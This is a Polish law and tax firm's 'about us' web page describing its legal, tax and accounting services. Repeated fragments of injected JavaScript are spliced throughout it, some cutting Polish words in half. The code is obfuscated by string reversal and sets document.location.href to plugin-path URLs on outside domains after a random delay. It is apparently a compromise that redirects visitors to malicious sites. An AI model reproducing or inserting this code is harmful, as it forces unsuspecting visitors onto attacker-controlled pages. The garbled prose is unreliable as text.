) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to;padding: 0px;”]
) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to;padding: 0px;”]
 
) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to;padding: 0px;”]

O naszej kancelarii


) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to;padding: 0px;”]

Nasza kancelaria zapewnia osobom prywatnym, spółkom i innym osobom rzetelne i profesjonalne doradztwo prawne oraz doradztwo podatkowe, reprezentację przed Sądami, w tym zwłaszcza Sądami Administracyjnymi, i innymi urzędami.

Kancelaria działa dla klientów we wszystkich rodzajach spraw, którymi się zajmujemy, w oparciu o bogatą wiedzę fachową oraz według wysokich standardów etycznych. Zapewniamy doświadczenie, solidność, skuteczność, dyskrecję oraz rozsądne koszty usług.

Podstawą działania naszej kancelarii jest wiedza i indywidualne podejście do każdej powierzonej sprawy. Szczególnie istoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totną kwestią dla nas jest stworzenie osobistych więzi z klientami, które polegają na wzajemnym zaufaniu i partnerstwie. Zaufanie połączone z ochroną poufności przekazywanych kancelarii danych pozwalają w sposób rzetelny dbać o interesy klienta w sprawach dotyczących umów cywilnoprawnych, umów gospodarczych, sprawach majątkowych, spadkowych, a także rozliczeniach podatkowych, prowadzeniu spraw podatkowych, prowadzeniu ksiąg i spraw kadrowych.

Połączenie kancelarii adwokackiej i podatkowej

W naszej kancelarii, aby budować trwałe, oparte na rzetelności i zaufaniu relacje z naszymi klientami zastoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowaliśmy, rozwiązania polegające na połączeniu dwóch różnych dziedzin, tj. prawa i podatków. Można u nas uzyskać nie tylko odpowiedzi na nurtujące naszych klientów wątpliwości natury prawnej lub podatkowej, ale także można nam zlecić przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towanie pozwów, wniosków, pism sądowych łącznie z reprezentacją przed Sądami Powszechnymi, a także przed Sądami Administracyjnym, zarejestrować spółkę, przekształcić spółkę, przekształcić działalność jednoosobową w spółkę, zlecić nam przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towanie wniosków, pism sądowych, reprezentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towanie przed Sądami Administracyjnymi, zlecić odwołanie od decyzji organów podatkowych. Można nam również zlecić prowadzenie ksiąg podatkowych, ksiąg rachunkowych, spraw kadrowych i rozliczeń. Cechą najbardziej istoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totną naszego profilu działalności jest właśnie kompleksowość usług – połączenie dwóch dziedzin pozornie ze sobą nie związanych, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to jest prawa i podatków. Dzięki temu możemy być jednocześnie biurem rachunkowym oraz kancelarią podatkową i prawną i nieść pomoc tym, którzy jej potrzebują.

Uważamy, że aby świadczyć usługi na możliwie najwyższym poziomie, musimy myśleć o kliencie nie tylko w zakresie bieżącego problemu, ale także proponować mu rozwiązania mające charakter strategiczny i dające i wszechstronnego wyjaśniania problemu, dbając o interes klienta i budując pełne, wzajemne zaufania relacje.